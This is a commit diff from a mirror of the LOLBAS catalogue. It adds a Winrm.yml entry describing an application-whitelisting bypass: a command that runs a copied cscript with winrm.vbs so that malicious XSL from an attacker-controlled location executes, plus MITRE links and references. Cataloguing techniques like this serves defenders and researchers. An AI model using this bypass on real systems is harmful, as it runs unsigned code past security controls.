public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 06:49:09 +01:00
Code Issues Projects Releases Wiki Activity

Added AWL Bypass

Browse Source
This commit is contained in:
bohops 2018-10-04 10:07:02 -04:00 committed by GitHub
parent f8e9ac5a0a
commit 783b4f3d9f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
yml/OSScripts/Winrm.yml
View File

@ -28,6 +28,14 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
Usecase: Execute aribtrary, unsigned code via XSL script
Category: AWL Bypass
Privileges: User
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs
@ -42,6 +50,8 @@ Resources:
- Link: https://github.com/enigma0x3/windows-operating-system-archaeology
- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
- Link: https://twitter.com/bohops/status/994405551751815170
- Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
- Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Acknowledgement:
- Person: Matt Nelson
Handle: '@enigma0x3'